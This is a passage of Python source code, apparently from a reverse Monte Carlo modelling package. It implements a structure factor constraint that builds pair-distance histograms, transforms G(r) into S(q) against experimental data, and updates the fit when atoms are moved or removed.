rmin={rmin}, rmax={rmax}, dr={dr}, scaleFactor={scaleFactor}, adjustScaleFactor={adjustScaleFactor}, \
shapeFuncParams=sfp, windowFunction=wf, limits={limits})".format(name=name, klass=klass,
weighting=self.weighting, atomsWeight=self.atomsWeight, rmin=self.rmin,
rmax=self.rmax, dr=self.dr, scaleFactor=self.scaleFactor,
adjustScaleFactor=self.adjustScaleFactor, limits=self.limits))
code.append("{engine}.add_constraints([{name}])".format(engine=engine, name=name))
# return
return dependencies, '\n'.join(code)
#def __getstate__(self):
# # make sure that __Gr2SqMatrix is not pickled but saved to the disk as None
# state = super(StructureFactorConstraint, self).__getstate__()
# state["_StructureFactorConstraint__Gr2SqMatrix"] = None
# return state
#
#def __setstate__(self, state):
# # make sure to regenerate G(r) to S(q) matrix at loading time
# self.__dict__.update( state )
# self.__set_Gr_2_Sq_matrix()
#
def __set_Gr_2_Sq_matrix(self):
if self.__experimentalQValues is None or self.__shellCenters is None:
self.__Gr2SqMatrix = None
else:
Qs = self.__experimentalQValues
Rs = self.__shellCenters
dr = self.__shellCenters[1]-self.__shellCenters[0]
qr = Rs.reshape((-1,1))*(np.ones((len(Rs),1), dtype=FLOAT_TYPE)*Qs)
sinqr = np.sin(qr)
sinqr_q = sinqr/Qs
self.__Gr2SqMatrix = dr*sinqr_q
def __set_weighting_scheme(self):
if self.engine is not None:
self.__elementsPairs = sorted(itertools.combinations_with_replacement(self.engine.elements,2))
#elementsWeight = dict([(el,float(get_element_property(el,self.__weighting))) for el in self.engine.elements])
#self._elementsWeight = dict([(el,self.__atomsWeight.get(el, float(get_element_property(el,self.__weighting)))) for el in self.engine.elements])
self._elementsWeight = get_real_elements_weight(elements=self.engine.elements, weightsDict=self.__atomsWeight, weighting=self.__weighting)
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight)
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
else:
self.__elementsPairs = None
self.__weightingScheme = None
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__elementsPairs' : self.__elementsPairs,
'_StructureFactorConstraint__weightingScheme': self.__weightingScheme})
def __set_histogram(self):
if self.__minimumDistance is None or self.__maximumDistance is None or self.__bin is None:
self.__shellCenters = None
self.__histogramSize = None
self.__shellVolumes = None
else:
# compute edges
if self.engine is not None and self.rmax is None:
minHalfBox = np.min( [np.linalg.norm(v)/2. for v in self.engine.basisVectors])
self.__edges = np.arange(self.__minimumDistance,minHalfBox, self.__bin).astype(FLOAT_TYPE)
else:
self.__edges = np.arange(self.__minimumDistance, self.__maximumDistance+self.__bin, self.__bin).astype(FLOAT_TYPE)
# adjust rmin and rmax
self.__minimumDistance = self.__edges[0]
self.__maximumDistance = self.__edges[-1]
# compute shellCenters
self.__shellCenters = (self.__edges[0:-1]+self.__edges[1:])/FLOAT_TYPE(2.)
# set histogram size
self.__histogramSize = INT_TYPE( len(self.__edges)-1 )
# set shell centers and volumes
self.__shellVolumes = FLOAT_TYPE(4.0/3.)*PI*((self.__edges[1:])**3 - self.__edges[0:-1]**3)
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__minimumDistance': self.__minimumDistance,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance,
'_StructureFactorConstraint__shellCenters' : self.__shellCenters,
'_StructureFactorConstraint__histogramSize' : self.__histogramSize,
'_StructureFactorConstraint__shellVolumes' : self.__shellVolumes})
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def _on_collector_reset(self):
pass
@property
def rmin(self):
""" Histogram minimum distance. """
return self.__rmin
@property
def rmax(self):
""" Histogram maximum distance. """
return self.__rmax
@property
def dr(self):
""" Histogram bin size."""
return self.__dr
@property
def bin(self):
""" Computed histogram distance bin size."""
return self.__bin
@property
def minimumDistance(self):
""" Computed histogram minimum distance. """
return self.__minimumDistance
@property
def maximumDistance(self):
""" Computed histogram maximum distance. """
return self.__maximumDistance
@property
def qmin(self):
""" Experimental data reciprocal distances minimum. """
return self.__qmin
@property
def qmax(self):
""" Experimental data reciprocal distances maximum. """
return self.__qmax
@property
def dq(self):
""" Experimental data reciprocal distances bin size. """
return self.__experimentalQValues[1]-self.__experimentalQValues[0]
@property
def experimentalQValues(self):
""" Experimental data used q values. """
return self.__experimentalQValues
@property
def histogramSize(self):
""" Histogram size"""
return self.__histogramSize
@property
def shellCenters(self):
""" Shells center array"""
return self.__shellCenters
@property
def shellVolumes(self):
""" Shells volume array"""
return self.__shellVolumes
@property
def experimentalSF(self):
""" Experimental Structure Factor or S(q)"""
return self.__experimentalSF
@property
def elementsPairs(self):
""" Elements pairs """
return self.__elementsPairs
@property
def atomsWeight(self):
"""Custom atoms weight"""
return self.__atomsWeight
@property
def weighting(self):
""" Elements weighting definition. """
return self.__weighting
@property
def weightingScheme(self):
""" Elements weighting scheme. """
return self.__weightingScheme
@property
def windowFunction(self):
""" Convolution window function. """
return self.__windowFunction
@property
def Gr2SqMatrix(self):
""" G(r) to S(q) transformation matrix."""
return self.__Gr2SqMatrix
@property
def _experimentalX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
@property
def _experimentalY(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalSF
@property
def _modelX(self):
"""For internal use only to interface
ExperimentalConstraint.get_constraints_properties"""
return self.__experimentalQValues
def listen(self, message, argument=None):
"""
Listens to any message sent from the Broadcaster.
:Parameters:
#. message (object): Any python object to send to constraint's
listen method.
#. argument (object): Any type of argument to pass to the
listeners.
"""
if message in ("engine set","update pdb","update molecules indexes","update elements indexes","update names indexes"):
self.__set_weighting_scheme()
# reset histogram
if self.engine is not None:
self.__set_histogram()
self.reset_constraint() # ADDED 2017-JAN-08
elif message in("update boundary conditions",):
self.reset_constraint()
def set_rmin(self, rmin):
"""
Set rmin value.
:parameters:
#. rmin (None, number): The minimum distance value to compute G(r)
histogram. If None is given, rmin is computed as
:math:`2 \\pi / Q_{max}`.
"""
if rmin is None:
minimumDistance = FLOAT_TYPE( 2.*PI/self.__qmax )
else:
assert is_number(rmin), LOGGER.error("rmin must be None or a number")
minimumDistance = FLOAT_TYPE(rmin)
if self.__maximumDistance is not None:
assert minimumDistance<self.__maximumDistance, LOGGER.error("rmin must be smaller than rmax %s"%self.__maximumDistance)
self.__rmin = rmin
self.__minimumDistance = minimumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmin': self.__rmin,
'_StructureFactorConstraint__minimumDistance': self.__minimumDistance})
# reset histogram
self.__set_histogram()
def set_rmax(self, rmax):
"""
Set rmax value.
:Parameters:
#. rmax (None, number): The maximum distance value to compute G(r)
histogram. If None is given, rmax is computed as
:math:`2 \\pi / dQ`.
"""
if rmax is None:
dq = self.__experimentalQValues[1]-self.__experimentalQValues[0]
maximumDistance = FLOAT_TYPE( 2.*PI/dq )
else:
assert is_number(rmax), LOGGER.error("rmax must be None or a number")
maximumDistance = FLOAT_TYPE(rmax)
if self.__minimumDistance is not None:
assert maximumDistance>self.__minimumDistance, LOGGER.error("rmax must be bigger than rmin %s"%self.__minimumDistance)
self.__rmax = rmax
self.__maximumDistance = maximumDistance
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__rmax': self.__rmax,
'_StructureFactorConstraint__maximumDistance': self.__maximumDistance})
# reset histogram
self.__set_histogram()
def set_dr(self, dr):
"""
Set dr value.
:Parameters:
#. dr (None, number): The distance bin value to compute G(r)
histogram. If None is given, bin is computed as
:math:`2 \\pi / (Q_{max}-Q_{min})`.
"""
if dr is None:
bin = 2.*PI/self.__qmax
rbin = round(bin,1)
if rbin>bin:
rbin -= 0.1
bin = FLOAT_TYPE( rbin )
else:
assert is_number(dr), LOGGER.error("dr must be None or a number")
bin = FLOAT_TYPE(dr)
self.__dr = dr
self.__bin = bin
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__dr': self.__dr,
'_StructureFactorConstraint__bin': self.__bin})
# reset histogram
self.__set_histogram()
def set_weighting(self, weighting):
"""
Set elements weighting. It must be a valid entry of pdbparser atom's
database.
:Parameters:
#. weighting (string): The elements weighting scheme. It must be
any atomic attribute (atomicNumber, neutronCohb, neutronIncohb,
neutronCohXs, neutronIncohXs, atomicWeight, covalentRadius)
defined in pdbparser database. In case of xrays or neutrons
experimental weights, one can simply set weighting to 'xrays'
or 'neutrons' and the value will be automatically adjusted to
respectively 'atomicNumber' and 'neutronCohb'. If attribute
values are missing in the pdbparser database, atomic weights
must be given in atomsWeight dictionary argument.
"""
if weighting.lower() in ["xrays","x-rays","xray","x-ray"]:
LOGGER.fixed("'%s' weighting is set to atomicNumber"%weighting)
weighting = "atomicNumber"
elif weighting.lower() in ["neutron","neutrons"]:
LOGGER.fixed("'%s' weighting is set to neutronCohb"%weighting)
weighting = "neutronCohb"
assert is_element_property(weighting),LOGGER.error( "weighting is not a valid pdbparser atoms database entry")
assert weighting != "atomicFormFactor", LOGGER.error("atomicFormFactor weighting is not allowed")
self.__weighting = weighting
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__weighting': self.__weighting})
def set_atoms_weight(self, atomsWeight):
"""
Custom set atoms weight. This is the way to setting a atoms weights
different than the given weighting scheme.
:Parameters:
#. atomsWeight (None, dict): Atoms weight dictionary where keys are
atoms element and values are custom weights. If None is given
or partially given, missing elements weighting will be fully set
given weighting scheme.
"""
if atomsWeight is None:
AW = {}
else:
assert isinstance(atomsWeight, dict),LOGGER.error("atomsWeight must be None or a dictionary")
AW = {}
for k in atomsWeight:
assert isinstance(k, basestring),LOGGER.error("atomsWeight keys must be strings")
try:
val = float(atomsWeight[k])
except:
raise LOGGER.error( "atomsWeight values must be numerical")
AW[k]=val
# set atomsWeight
self.__atomsWeight = AW
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__atomsWeight': self.__atomsWeight})
def set_window_function(self, windowFunction):
"""
Set convolution window function.
:Parameters:
#. windowFunction (None, numpy.ndarray): The window function to
convolute with the computed pair distribution function of the
system prior to comparing it with the experimental data. In
general, the experimental pair distribution function G(r) shows
artificial wrinkles, among others the main reason is because
G(r) is computed by applying a sine Fourier transform to the
experimental structure factor S(q). Therefore window function is
used to best imitate the numerical artefacts in the experimental
data.
"""
if windowFunction is not None:
assert isinstance(windowFunction, np.ndarray), LOGGER.error("windowFunction must be a numpy.ndarray")
assert windowFunction.dtype.type is FLOAT_TYPE, LOGGER.error("windowFunction type must be %s"%FLOAT_TYPE)
assert len(windowFunction.shape) == 1, LOGGER.error("windowFunction must be of dimension 1")
assert len(windowFunction) <= self.experimentalData.shape[0], LOGGER.error("windowFunction length must be smaller than experimental data")
# normalize window function
windowFunction /= np.sum(windowFunction)
# check window size
# set windowFunction
self.__windowFunction = windowFunction
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__windowFunction': self.__windowFunction})
def set_experimental_data(self, experimentalData):
"""
Set constraint's experimental data.
:Parameters:
#. experimentalData (numpy.ndarray, string): The experimental
data as numpy.ndarray or string path to load data using
numpy.loadtxt function.
"""
# get experimental data
super(StructureFactorConstraint, self).set_experimental_data(experimentalData=experimentalData)
# set limits
self.set_limits(self.limits)
def set_limits(self, limits):
"""
Set the reciprocal distance limits (qmin, qmax).
:Parameters:
#. limits (None, tuple, list): Distance limits to bound
experimental data and compute histograms.
If None is given, the limits will be automatically set to
min and max reciprocal distance recorded in experimental data.
If given, a tuple of minimum reciprocal distance (qmin) or None
and maximum reciprocal distance (qmax) or None should be given.
"""
self._ExperimentalConstraint__set_limits(limits)
# set qvalues
self.__experimentalQValues = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,0].astype(FLOAT_TYPE)
self.__experimentalSF = self.experimentalData[self.limitsIndexStart:self.limitsIndexEnd+1,1].astype(FLOAT_TYPE)
# set qmin and qmax
self.__qmin = self.__experimentalQValues[0]
self.__qmax = self.__experimentalQValues[-1]
assert self.__qmin>0, LOGGER.error("qmin must be bigger than 0. Experimental null q values are ambigous. Try setting limits.")
# dump to repository
self._dump_to_repository({'_StructureFactorConstraint__experimentalQValues': self.__experimentalQValues,
'_StructureFactorConstraint__experimentalSF' : self.__experimentalSF,
'_StructureFactorConstraint__qmin' : self.__qmin,
'_StructureFactorConstraint__qmax' : self.__qmax})
# set used dataWeights
self._set_used_data_weights(limitsIndexStart=self.limitsIndexStart, limitsIndexEnd=self.limitsIndexEnd)
# reset constraint
self.reset_constraint()
# reset sq matrix
self.__set_Gr_2_Sq_matrix()
def update_standard_error(self):
""" Compute and set constraint's standardError."""
# set standardError
totalSQ = self.get_constraint_value()["total_no_window"]
self.set_standard_error(self.compute_standard_error(modelData = totalSQ))
def check_experimental_data(self, experimentalData):
"""
Check whether experimental data is correct.
:Parameters:
#. experimentalData (object): The experimental data to check.
:Returns:
#. result (boolean): Whether it is correct or not.
#. message (str): Checking message that explains whats's wrong
with the given data
"""
if not isinstance(experimentalData, np.ndarray):
return False, "experimentalData must be a numpy.ndarray"
if experimentalData.dtype.type is not FLOAT_TYPE:
return False, "experimentalData type must be %s"%FLOAT_TYPE
if len(experimentalData.shape) !=2:
return False, "experimentalData must be of dimension 2"
if experimentalData.shape[1] !=2:
return False, "experimentalData must have only 2 columns"
# check distances order
inOrder = (np.array(sorted(experimentalData[:,0]), dtype=FLOAT_TYPE)-experimentalData[:,0])<=PRECISION
if not np.all(inOrder):
return False, "experimentalData distances are not sorted in order"
if experimentalData[0][0]<0:
return False, "experimentalData distances min value is found negative"
# data format is correct
return True, ""
def compute_standard_error(self, modelData):
"""
Compute the standard error (StdErr) as the squared deviations
between model computed data and the experimental ones.
.. math::
StdErr = \\sum \\limits_{i}^{N} W_{i}(Y(X_{i})-F(X_{i}))^{2}
Where:\n
:math:`N` is the total number of experimental data points. \n
:math:`W_{i}` is the data point weight. It becomes equivalent to 1 when dataWeights is set to None. \n
:math:`Y(X_{i})` is the experimental data point :math:`X_{i}`. \n
:math:`F(X_{i})` is the computed from the model data :math:`X_{i}`. \n
:Parameters:
#. modelData (numpy.ndarray): The data to compare with the
experimental one and compute the squared deviation.
:Returns:
#. standardError (number): The calculated constraint's
standardError.
"""
# compute difference
diff = self.__experimentalSF-modelData
# return standard error
if self._usedDataWeights is None:
return np.add.reduce((diff)**2)
else:
return np.add.reduce(self._usedDataWeights*((diff)**2))
def _get_Sq_from_Gr(self, Gr):
return np.sum(Gr.reshape((-1,1))*self.__Gr2SqMatrix, axis=0)+1
def _apply_scale_factor(self, Sq, scaleFactor):
if scaleFactor != 1:
Sq = scaleFactor*(Sq-1) + 1
return Sq
def __get_total_Sq(self, data, rho0):
"""This method is created just to speed up the computation of
the total Sq upon fitting."""
Gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["inter"][idi,idj,:]
Gr += wij*nij/Dij
else:
Nij = ni*nj
Dij = Nij/self.engine.volume
nij = data["intra"][idi,idj,:]+data["intra"][idj,idi,:] + data["inter"][idi,idj,:]+data["inter"][idj,idi,:]
Gr += wij*nij/Dij
# Devide by shells volume
Gr /= self.shellVolumes
# compute total G(r)
#rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0)*(Gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# Multiply by scale factor
self._fittedScaleFactor = self.get_adjusted_scale_factor(self.__experimentalSF, Sq, self._usedDataWeights)
# apply scale factor
Sq = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
Sq = self._apply_multiframe_prior(Sq)
# convolve total with window function
if self.__windowFunction is not None:
Sq = np.convolve(Sq, self.__windowFunction, 'same')
return Sq
def get_adjusted_scale_factor(self, experimentalData, modelData, dataWeights):
"""Overload to reduce S(q) prior to fitting scale factor.
S(q) -> 1 at high q and this will create a wrong scale factor.
Overloading can be avoided but it's better to for performance reasons
"""
SF = self.scaleFactor
# check to update scaleFactor
if self.adjustScaleFactorFrequency:
if not self.engine.accepted%self.adjustScaleFactorFrequency:
SF = self.fit_scale_factor(experimentalData-1, modelData-1, dataWeights)
return SF
def _get_constraint_value(self, data, applyMultiframePrior=True):
# http://erice2011.docking.org/upload/Other/Billinge_PDF/03-ReadingMaterial/BillingePDF2011.pdf page 6
#import time
#startTime = time.clock()
output = {}
for pair in self.__elementsPairs:
output["sf_intra_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_inter_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
output["sf_total_%s-%s" % pair] = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
gr = np.zeros(self.__histogramSize, dtype=FLOAT_TYPE)
for pair in self.__elementsPairs:
# get weighting scheme
wij = self.__weightingScheme.get(pair[0]+"-"+pair[1], None)
if wij is None:
wij = self.__weightingScheme[pair[1]+"-"+pair[0]]
# get number of atoms per element
ni = self.engine.numberOfAtomsPerElement[pair[0]]
nj = self.engine.numberOfAtomsPerElement[pair[1]]
# get index of element
idi = self.engine.elements.index(pair[0])
idj = self.engine.elements.index(pair[1])
# get Nij
if idi == idj:
Nij = ni*(ni-1)/2.0
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:]
else:
Nij = ni*nj
output["sf_intra_%s-%s" % pair] += data["intra"][idi,idj,:] + data["intra"][idj,idi,:]
output["sf_inter_%s-%s" % pair] += data["inter"][idi,idj,:] + data["inter"][idj,idi,:]
# compute g(r)
nij = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
dij = nij/self.__shellVolumes
Dij = Nij/self.engine.volume
gr += wij*dij/Dij
# calculate intensityFactor
intensityFactor = (self.engine.volume*wij)/(Nij*self.__shellVolumes)
# divide by factor
output["sf_intra_%s-%s" % pair] *= intensityFactor
output["sf_inter_%s-%s" % pair] *= intensityFactor
output["sf_total_%s-%s" % pair] = output["sf_intra_%s-%s" % pair] + output["sf_inter_%s-%s" % pair]
# Compute S(q) from G(r)
output["sf_intra_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_intra_%s-%s" % pair])
output["sf_inter_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_inter_%s-%s" % pair])
output["sf_total_%s-%s" % pair] = self._get_Sq_from_Gr(output["sf_total_%s-%s" % pair])
# compute total G(r)
rho0 = (self.engine.numberOfAtoms/self.engine.volume).astype(FLOAT_TYPE)
Gr = (FLOAT_TYPE(4.)*PI*self.__shellCenters*rho0) * (gr-1)
# Compute S(q) from G(r)
Sq = self._get_Sq_from_Gr(Gr)
# multiply by scale factor
output["total_no_window"] = self._apply_scale_factor(Sq, self._fittedScaleFactor)
# apply multiframe prior and weight
if applyMultiframePrior:
output["total_no_window"] = self._apply_multiframe_prior(output["total_no_window"])
# convolve total with window function
if self.__windowFunction is not None:
output["total"] = np.convolve(output["total_no_window"], self.__windowFunction, 'same').astype(FLOAT_TYPE)
else:
output["total"] = output["total_no_window"]
return output
def get_constraint_value(self, applyMultiframePrior=True):
"""
Compute all partial Structure Factor (SQs).
:Parameters:
#. applyMultiframePrior (boolean): Whether to apply subframe weight
and prior to the total. This will only have an effect when used
frame is a subframe and in case subframe weight and prior is
defined.
:Returns:
#. SQs (dictionary): The SQs dictionnary, where keys are the
element wise intra and inter molecular SQs and values are
the computed SQs.
"""
if self.data is None:
LOGGER.warn("data must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.data, applyMultiframePrior=applyMultiframePrior)
def get_constraint_original_value(self):
"""
Compute all partial Pair Distribution Functions (PDFs).
:Returns:
#. PDFs (dictionary): The PDFs dictionnary, where keys are the
element wise intra and inter molecular PDFs and values are the
computed PDFs.
"""
if self.originalData is None:
LOGGER.warn("originalData must be computed first using 'compute_data' method.")
return {}
return self._get_constraint_value(self.originalData)
@reset_if_collected_out_of_date
def compute_data(self, update=True):
""" Compute constraint's data.
:Parameters:
#. update (boolean): whether to update constraint data and
standard error with new computation. If data is computed and
updated by another thread or process while the stochastic
engine is running, this might lead to a state alteration of
the constraint which will lead to a no additional accepted
moves in the run
:Returns:
#. data (dict): constraint data dictionary
#. standardError (float): constraint standard error
"""
intra,inter = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# create data and compute standard error
data = {"intra":intra, "inter":inter}
totalSQ = self.__get_total_Sq(data, rho0=self.engine.numberDensity)
stdError = self.compute_standard_error(modelData = totalSQ)
# update
if update:
self.set_data(data)
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
self.set_standard_error(stdError)
# set original data
if self.originalData is None:
self._set_original_data(self.data)
# return
return data, stdError
def compute_before_move(self, realIndexes, relativeIndexes):
"""
Compute constraint before move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
"""
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
self.set_active_atoms_data_before_move( {"intra":intraM-intraF, "inter":interM-interF} )
self.set_active_atoms_data_after_move(None)
def compute_after_move(self, realIndexes, relativeIndexes, movedBoxCoordinates):
"""
Compute constraint after move is executed
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Group atoms relative index
the move will be applied to.
#. movedBoxCoordinates (numpy.ndarray): The moved atoms new coordinates.
"""
# change coordinates temporarily
boxData = np.array(self.engine.boxCoordinates[relativeIndexes], dtype=FLOAT_TYPE)
self.engine.boxCoordinates[relativeIndexes] = movedBoxCoordinates
# calculate pair distribution function
intraM,interM = multiple_pairs_histograms_coords( indexes = relativeIndexes,
boxCoords = self.engine.boxCoordinates,
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex,
elementIndex = self.engine.elementsIndex,
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
allAtoms = True,
ncores = self.engine._runtime_ncores )
intraF,interF = full_pairs_histograms_coords( boxCoords = self.engine.boxCoordinates[relativeIndexes],
basis = self.engine.basisVectors,
isPBC = self.engine.isPBC,
moleculeIndex = self.engine.moleculesIndex[relativeIndexes],
elementIndex = self.engine.elementsIndex[relativeIndexes],
numberOfElements = self.engine.numberOfElements,
minDistance = self.__minimumDistance,
maxDistance = self.__maximumDistance,
histSize = self.__histogramSize,
bin = self.__bin,
ncores = self.engine._runtime_ncores )
# set active atoms data
self.set_active_atoms_data_after_move( {"intra":intraM-intraF, "inter":interM-interF} )
# reset coordinates
self.engine.boxCoordinates[relativeIndexes] = boxData
# compute standardError after move
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
totalSQ = self.__get_total_Sq({"intra":dataIntra, "inter":dataInter}, rho0=self.engine.numberDensity)
self.set_after_move_standard_error( self.compute_standard_error(modelData = totalSQ) )
# increment tried
self.increment_tried()
def accept_move(self, realIndexes, relativeIndexes):
"""
Accept move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]+self.activeAtomsDataAfterMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]+self.activeAtomsDataAfterMove["inter"]
# change permanently _data
self.set_data( {"intra":dataIntra, "inter":dataInter} )
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_standard_error( self.afterMoveStandardError )
self.set_after_move_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
# increment accepted
self.increment_accepted()
def reject_move(self, realIndexes, relativeIndexes):
"""
Reject move
:Parameters:
#. realIndexes (numpy.ndarray): Not used here.
#. relativeIndexes (numpy.ndarray): Not used here.
"""
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
self.set_active_atoms_data_after_move(None)
# update standardError
self.set_after_move_standard_error( None )
def compute_as_if_amputated(self, realIndex, relativeIndex):
"""
Compute and return constraint's data and standard error as if
given atom is amputated.
:Parameters:
#. realIndex (numpy.ndarray): Atom's index as a numpy array
of a single element.
#. relativeIndex (numpy.ndarray): Atom's relative index as a
numpy array of a single element.
"""
# compute data
self.compute_before_move(realIndexes=realIndex, relativeIndexes=relativeIndex)
dataIntra = self.data["intra"]-self.activeAtomsDataBeforeMove["intra"]
dataInter = self.data["inter"]-self.activeAtomsDataBeforeMove["inter"]
data = {"intra":dataIntra, "inter":dataInter}
# temporarily adjust self.__weightingScheme
weightingScheme = self.__weightingScheme
relativeIndex = relativeIndex[0]
selectedElement = self.engine.allElements[relativeIndex]
self.engine.numberOfAtomsPerElement[selectedElement] -= 1
self.__weightingScheme = get_normalized_weighting(numbers=self.engine.numberOfAtomsPerElement, weights=self._elementsWeight )
for k in self.__weightingScheme:
self.__weightingScheme[k] = FLOAT_TYPE(self.__weightingScheme[k])
## END OF ADDED 08 FEB 2017
# compute standard error
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
SF = self.adjustScaleFactorFrequency
self._set_adjust_scale_factor_frequency(0)
rho0 = ((self.engine.numberOfAtoms-1)/self.engine.volume).astype(FLOAT_TYPE)
totalSQ = self.__get_total_Sq(data, rho0=rho0)
standardError = self.compute_standard_error(modelData = totalSQ)
if not self.engine._RT_moveGenerator.allowFittingScaleFactor:
self._set_adjust_scale_factor_frequency(SF)
# reset activeAtoms data
self.set_active_atoms_data_before_move(None)
# set amputation
self.set_amputation_data( {'data':data, 'weightingScheme':self.__weightingScheme} )
# compute standard error
self.set_amputation_standard_error( standardError )
# reset weightingScheme and number of atoms per element
self.__weightingScheme = weightingScheme
self.engine.numberOfAtomsPerElement[selectedElement] += 1
def accept_amputation(self, realIndex, relativeIndex):
"""
Accept amputated atom and sets constraints data and standard error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
#self.set_data( self.amputationData ) ## COMMENTED 08 FEB 2017
self.set_data( self.amputationData['data'] )
self.__weightingScheme = self.amputationData['weightingScheme']
self.set_standard_error( self.amputationStandardError )
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
# set new scale factor
self._set_fitted_scale_factor_value(self._fittedScaleFactor)
def reject_amputation(self, realIndex, relativeIndex):
"""
Reject amputated atom and set constraint's data and standard
error accordingly.
:Parameters:
#. realIndex (numpy.ndarray): Not used here.
#. relativeIndex (numpy.ndarray): Not used here.
"""
self.set_amputation_data( None )
self.set_amputation_standard_error( None )
def _on_collector_collect_atom(self, realIndex):
pass
def _on_collector_release_atom(self, realIndex):
pass
def _constraint_copy_needs_lut(self):
return {'_StructureFactorConstraint__elementsPairs' :'_StructureFactorConstraint__elementsPairs',
'_StructureFactorConstraint__histogramSize' :'_StructureFactorConstraint__histogramSize',
'_StructureFactorConstraint__weightingScheme' :'_StructureFactorConstraint__weightingScheme',
'_StructureFactorConstraint__shellVolumes' :'_StructureFactorConstraint__shellVolumes',
'_StructureFactorConstraint__shellCenters' :'_StructureFactorConstraint__shellCenters',
'_StructureFactorConstraint__windowFunction' :'_StructureFactorConstraint__windowFunction',
'_StructureFactorConstraint__experimentalQValues' :'_StructureFactorConstraint__experimentalQValues',
'_StructureFactorConstraint__experimentalSF' :'_StructureFactorConstraint__experimentalSF',
'_StructureFactorConstraint__Gr2SqMatrix' :'_StructureFactorConstraint__Gr2SqMatrix',
'_StructureFactorConstraint__minimumDistance' :'_StructureFactorConstraint__minimumDistance',
'_StructureFactorConstraint__maximumDistance' :'_StructureFactorConstraint__maximumDistance',
'_StructureFactorConstraint__bin' :'_StructureFactorConstraint__bin',
